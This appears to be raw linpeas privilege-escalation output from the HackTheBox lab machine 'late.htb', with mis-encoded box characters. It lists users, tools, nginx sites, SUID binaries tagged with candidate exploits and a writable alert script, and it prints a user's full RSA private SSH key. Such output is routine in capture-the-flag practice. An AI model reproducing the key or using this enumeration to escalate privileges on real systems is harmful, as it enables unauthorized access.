ââââââââââââĢ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=111(rtkit) gid=114(rtkit) groups=114(rtkit)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(avahi) gid=116(avahi) groups=116(avahi)
uid=114(cups-pk-helper) gid=117(lpadmin) groups=117(lpadmin)
uid=115(saned) gid=119(saned) groups=119(saned),118(scanner)
uid=116(colord) gid=120(colord) groups=120(colord)
uid=117(pulse) gid=121(pulse) groups=121(pulse),29(audio)
uid=118(geoclue) gid=123(geoclue) groups=123(geoclue)
uid=119(smmta) gid=124(smmta) groups=124(smmta)
uid=120(smmsp) gid=125(smmsp) groups=125(smmsp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
ââââââââââââĢ Login now
20:18:48 up 8:40, 0 users, load average: 0.51, 0.15, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ââââââââââââĢ Last logons
reboot system boot Fri Apr 29 11:38:30 2022 still running 0.0.0.0
wtmp begins Fri Apr 29 11:38:30 2022
ââââââââââââĢ Last time logon each user
Username Port From Latest
ââââââââââââĢ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
ââââââââââââĢ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
ââââââââââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââââĢ Software Information â âââââââââââââââââââââââââââââââââââââââ
ââââââââââââââââââââââââ
ââââââââââââĢ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget
ââââââââââââĢ Installed Compilers
ii bcc 0.16.17-3.3 amd64 16-bit x86 C compiler
ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler
ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler
ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler
ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler
/usr/bin/gcc
ââââââââââââĢ Searching mysql credentials and exec
Potential file containing credentials:
-rw-r--r-- 1 root root 641 Sep 27 2018 /etc/apparmor.d/abstractions/mysql
# ------------------------------------------------------------------
# Copyright (C) 2002-2006 Novell/SUSE
# Copyright (C) 2013 Christian Boltz
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License published by the Free Software Foundation.
# ------------------------------------------------------------------
/var/lib/mysql{,d}/mysql{,d}.sock rw,
/{var/,}run/mysql{,d}/mysql{,d}.sock rw,
/usr/share/{mysql,mysql-community-server,mariadb}/charsets/ r,
/usr/share/{mysql,mysql-community-server,mariadb}/charsets/*.xml r,
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
ââââââââââââĢ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found
httpd Not Found
Nginx version:
âââĢ Nginx modules
ngx_http_geoip_module.so
ngx_http_image_filter_module.so
ngx_http_xslt_filter_module.so
ngx_mail_module.so
ngx_stream_module.so
âââĢ PHP exec extensions
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Jan 5 14:39 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
server_name late.htb;
location / {
try_files $uri $uri/ =404;
}
}
server {
listen 80;
listen [::]:80;
server_name images.late.htb;
access_log /var/log/nginx/application.access.log;
error_log /var/log/nginx/appliation.error.log;
location / {
include proxy_params;
proxy_pass http://127.0.0.1:8000;
}
}
ââââââââââââĢ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1051 Jan 20 14:41 /etc/nginx/fastcgi_params
ââââââââââââĢ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Feb 8 12:26 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
ââââââââââââĢ Analyzing Wifi Connections Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/NetworkManager/system-connections
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/NetworkManager/system-connections
ââââââââââââĢ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/ldap
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /usr/share/sendmail/examples/ldap
ââââââââââââĢ Searching ssl/ssh files
ââââââââââââĢ Analyzing SSH Files (limit 70)
-rw------- 1 svc_acc svc_acc 1679 Apr 7 11:08 /home/svc_acc/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 svc_acc svc_acc 394 Apr 7 11:08 /home/svc_acc/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp7ldYUpWqV4LJ/M+jgex9FHy4X8//dOf5+IBQeGca8EEDKsweI/dL8Oep0gfa6pNd0+Th4Z1fKfMycVHNthv5wFr5HxP+dNrc9K5H22SKqFdNoQ5uCNFLKevY24NY9CFfw6aEAp0mFl8StlRxvGK6dysqegKVktDplkNo1O1NTClRoyL+a1ofMsgPUpOX51QWwtBiZ1FQDrf3GTPVi8MXk5sgOh4eA5TutlXhOoDqzqAjtbt3Xfszc6LZZNZEHNxZMAzB9InZwS229L8CcT8HYR6WPWyFhRm4/IiguFIyJwaeEHvsgqll5D4yCSxFwcnl8naG9O79PfIv22CB/0Ox svc_acc@late
-rw-rw-r-- 1 svc_acc svc_acc 394 Apr 7 11:08 /home/svc_acc/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp7ldYUpWqV4LJ/M+jgex9FHy4X8//dOf5+IBQeGca8EEDKsweI/dL8Oep0gfa6pNd0+Th4Z1fKfMycVHNthv5wFr5HxP+dNrc9K5H22SKqFdNoQ5uCNFLKevY24NY9CFfw6aEAp0mFl8StlRxvGK6dysqegKVktDplkNo1O1NTClRoyL+a1ofMsgPUpOX51QWwtBiZ1FQDrf3GTPVi8MXk5sgOh4eA5TutlXhOoDqzqAjtbt3Xfszc6LZZNZEHNxZMAzB9InZwS229L8CcT8HYR6WPWyFhRm4/IiguFIyJwaeEHvsgqll5D4yCSxFwcnl8naG9O79PfIv22CB/0Ox svc_acc@late
PermitRootLogin no
PubkeyAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
âââĢ Possible private SSH keys were found!
/home/svc_acc/.ssh/id_rsa
âââĢ Some certificates were found (out limited):
/etc/mail/tls/sendmail-client.crt
/etc/mail/tls/sendmail-server.crt
/etc/pollinate/entropy.ubuntu.com.pem
8994PSTORAGE_CERTSBIN
gpg-connect-agent: no running gpg-agent - starting '/usr/bin/gpg-agent'
gpg-connect-agent: waiting for the agent to come up ... (5s)
gpg-connect-agent: waiting for the agent to come up ... (4s)
gpg-connect-agent: connection to agent established
âââĢ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
âââĢ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
sendmail: all
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
ââââââââââââĢ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/pam.d
-rw-r--r-- 1 root root 2219 Jan 14 13:56 /etc/pam.d/sshd
ââââââââââââĢ Searching tmux sessions
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux 2.6
/tmp/tmux-1000
ââââââââââââĢ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3759 Mar 24 15:49 /etc/cloud/cloud.cfg
lock_passwd: True
ââââââââââââĢ Analyzing Keyring Files (limit 70)
drwx------ 2 svc_acc svc_acc 4096 Jan 16 18:58 /home/svc_acc/.local/share/keyrings
drwxr-xr-x 3 root root 4096 Jan 12 09:31 /usr/lib/python2.7/dist-packages/keyrings
drwxr-xr-x 3 root root 4096 Apr 7 13:51 /usr/lib/python3/dist-packages/keyrings
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /usr/share/keyrings
-rw------- 1 svc_acc svc_acc 105 Jan 16 18:58 /home/svc_acc/.local/share/keyrings/login.keyring
-rw------- 1 svc_acc svc_acc 0 Jan 16 18:58 /home/svc_acc/.local/share/keyrings/user.keystore
ââââââââââââĢ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
ââââââââââââĢ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 355 Jan 5 12:16 /etc/apt/trusted.gpg.d/alex-p_ubuntu_tesseract-ocr-devel.gpg
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 16 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 2253 Mar 21 2018 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-updates-keyring.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg
drwx------ 3 svc_acc svc_acc 4096 Apr 29 20:18 /home/svc_acc/.gnupg
ââââââââââââĢ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr 2 2018 /usr/share/bash-completion/completions/postfix
ââââââââââââĢ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
ââââââââââââĢ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 root root 35208587 Apr 29 17:42 /var/log/nginx/access.log
-rw-r--r-- 1 root root 195 Apr 29 15:32 /var/log/nginx/error.log
ââââââââââââĢ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 24 Jan 14 08:42 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 56 Jan 14 08:42 /var/lib/dpkg/alternatives/my.cnf
ââââââââââââĢ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc
-rw-r--r-- 1 svc_acc svc_acc 3771 Apr 4 2018 /home/svc_acc/.bashrc
-rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile
-rw-r--r-- 1 svc_acc svc_acc 807 Apr 4 2018 /home/svc_acc/.profile
âââââââââââââââââââââ
ââââââââââââââââââââââââââââââââââââââââââĢ Interesting Files â âââââââââââââââââââââââââââââââââââââââââ
âââââââââââââââââââââ
ââââââââââââĢ SUID - Check easy privesc, exploits and write perms
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-- 1 root dip 370K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 10K Jan 13 2018 /usr/sbin/sensible-mda (Unknown SUID binary)
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 59K Jan 25 16:26 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40K Jan 25 16:26 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 146K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /usr/bin/chsh
-rwsr-xr-x 1 root root 22K Jun 28 2019 /usr/bin/arping
-rwsr-sr-x 1 root mail 95K Nov 16 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 427K Mar 3 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14K Jan 12 12:34 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /bin/su
-rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996)
ââââââââââââĢ SGID
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /usr/bin/wall
-rwxr-sr-x 1 root shadow 23K Jan 25 16:26 /usr/bin/expiry
-rwxr-sr-x 1 root mail 18K Nov 16 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root ssh 355K Mar 3 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 71K Jan 25 16:26 /usr/bin/chage
-rwsr-sr-x 1 root mail 95K Nov 16 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 3 root mail 15K Apr 21 2017 /usr/bin/mail-lock
-rwxr-sr-x 1 root mail 18K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root mail 11K Nov 7 2017 /usr/bin/dotlock.mailutils
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 3 root mail 15K Apr 21 2017 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root crontab 39K Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 3 root mail 15K Apr 21 2017 /usr/bin/mail-unlock
-rwxr-sr-x 1 root smmsp 845K Jan 13 2018 /usr/lib/sm.bin/sendmail ---> Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_(SGI_ProPack_1.2/1.3)
-rwxr-sr-x 1 root smmsp 77K Jan 13 2018 /usr/lib/sm.bin/mailstats (Unknown SGID binary)
-rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /sbin/unix_chkpwd
ââââââââââââĢ Checking misconfigurations of ld.so
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
/usr/lib/x86_64-linux-gnu/libfakeroot
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
ââââââââââââĢ Capabilities
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
ââââââââââââĢ Users with capabilities
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
ââââââââââââĢ Files with ACLs (limited to 50)
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
files with acls in searched folders Not Found
ââââââââââââĢ .sh files in path
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
You own the script: /usr/local/sbin/ssh-alert.sh
/usr/bin/gettext.sh
ââââââââââââĢ Unexpected in root
/initrd.img
/initrd.img.old
/vmlinuz.old
/vmlinuz
ââââââââââââĢ Files (scripts) in /etc/profile.d/
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files
total 48
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
-rw-r--r-- 1 root root 652 Apr 3 2019 input-method-config.sh
-rw-r--r-- 1 root root 1941 Jul 16 2018 vte-2.91.sh
-rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh
-rwxr-xr-x 1 root root 873 Jun 3 2020 Z99-cloudinit-warnings.sh
-rwxr-xr-x 1 root root 3417 Jun 3 2020 Z99-cloud-locale-test.sh
ââââââââââââĢ Permissions in init, init.d, systemd, and rc.d
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
ââĢ Hashes inside passwd file? ........... No
ââĢ Writable passwd file? ................ No
ââĢ Credentials in fstab/mtab? ........... No
ââĢ Can I read shadow files? ............. No
ââĢ Can I read shadow plists? ............ No
ââĢ Can I write shadow plists? ........... No
ââĢ Can I read opasswd file? ............. No
ââĢ Can I write in network-scripts? ...... No
ââĢ Can I read root folder? .............. No
ââââââââââââĢ Searching root files in home dirs (limit 30)
/home/
/home/svc_acc/app/templates/footer.html
/home/svc_acc/app/templates/result.html
/home/svc_acc/app/templates/header.html
/home/svc_acc/app/templates/index.html
/home/svc_acc/app/__pycache__
/home/svc_acc/app/__pycache__/main.cpython-36.pyc
/home/svc_acc/app/__pycache__/wsgi.cpython-36.pyc
/home/svc_acc/app/static/css
/home/svc_acc/app/static/css/style.min.css
/home/svc_acc/app/static/css/mdb.css
/home/svc_acc/app/static/css/modules
/home/svc_acc/app/static/css/modules/animations-extended.css
/home/svc_acc/app/static/css/modules/animations-extended.min.css
/home/svc_acc/app/static/css/style.css
/home/svc_acc/app/static/css/bootstrap.css
/home/svc_acc/app/static/css/mdb.lite.min.css
/home/svc_acc/app/static/css/mdb.min.css
/home/svc_acc/app/static/css/addons
/home/svc_acc/app/static/css/addons/directives.min.css
/home/svc_acc/app/static/css/addons/datatables.min.css
/home/svc_acc/app/static/css/addons/datatables-select.css
/home/svc_acc/app/static/css/addons/datatables-select.min.css
/home/svc_acc/app/static/css/addons/directives.css
/home/svc_acc/app/static/css/addons/datatables.css
/home/svc_acc/app/static/css/bootstrap.min.css
/home/svc_acc/app/static/css/mdb.lite.css
/home/svc_acc/app/static/img
/home/svc_acc/app/static/img/overlays
/home/svc_acc/app/static/img/overlays/01.png
ââââââââââââĢ Searching folders owned by me containing others files on it (limit 100)
/home/svc_acc
/home/svc_acc/app
/home/svc_acc/app/static
/home/svc_acc/app/templates
ââââââââââââĢ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root svc_acc 33 Apr 29 11:38 /home/svc_acc/user.txt
ââââââââââââĢ Modified interesting files in the last 5mins (limit 100)
/home/svc_acc/.gnupg/pubring.kbx
/home/svc_acc/.gnupg/trustdb.gpg
/home/svc_acc/.config/lxc/config.yml
/usr/local/sbin/ssh-alert.sh
/var/log/kern.log
/var/log/syslog
/var/log/journal/68ed0714af124461afecf837a54c1b73/user-1000.journal
/var/log/journal/68ed0714af124461afecf837a54c1b73/system.journal
/var/log/nginx/application.access.log
/var/log/nginx/appliation.error.log
/var/log/auth.log
/var/log/mail.log
/var/mail/root
ââââââââââââĢ Writable log files (logrotten) (limit 100)
â https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
ââââââââââââĢ Files inside /home/svc_acc (limit 20)
total 804
drwxr-xr-x 8 svc_acc svc_acc 4096 Apr 29 20:18 .
drwxr-xr-x 3 root root 4096 Jan 5 10:44 ..
drwxrwxr-x 7 svc_acc svc_acc 4096 Apr 29 20:17 app
lrwxrwxrwx 1 svc_acc svc_acc 9 Jan 16 18:45 .bash_history -> /dev/null
-rw-r--r-- 1 svc_acc svc_acc 3771 Apr 4 2018 .bashrc
drwx------ 3 svc_acc svc_acc 4096 Apr 7 13:51 .cache
drwxr-x--- 3 svc_acc svc_acc 4096 Apr 29 20:18 .config
drwx------ 3 svc_acc svc_acc 4096 Apr 29 20:18 .gnupg
-rwxr-xr-x 1 svc_acc svc_acc 776167 Apr 29 20:18 linpeas.sh
drwxrwxr-x 5 svc_acc svc_acc 4096 Jan 5 12:13 .local
-rw-r--r-- 1 svc_acc svc_acc 807 Apr 4 2018 .profile
drwx------ 2 svc_acc svc_acc 4096 Apr 7 11:08 .ssh
-rw-r----- 1 root svc_acc 33 Apr 29 11:38 user.txt
ââââââââââââĢ Files inside others home (limit 20)
ââââââââââââĢ Searching installed mail applications
sendmail
sendmail-msp
sendmail-mta
ââââââââââââĢ Mails (limit 50)
82571 4 -rw------- 1 root mail 2664 Apr 29 20:18 /var/mail/root
82571 4 -rw------- 1 root mail 2664 Apr 29 20:18 /var/spool/mail/root
ââââââââââââĢ Backup folders
ââââââââââââĢ Backup files (limited 100)
-rw-r--r-- 1 root root 2765 Aug 6 2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 57 Mar 5 2014 /usr/share/sendmail/cf/siteconfig/uucp.old.arpa.m4
-rw-r--r-- 1 root root 1758 Mar 24 2020 /usr/share/sosreport/sos/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1397 Aug 6 2020 /usr/share/sosreport/sos/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc
-rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz
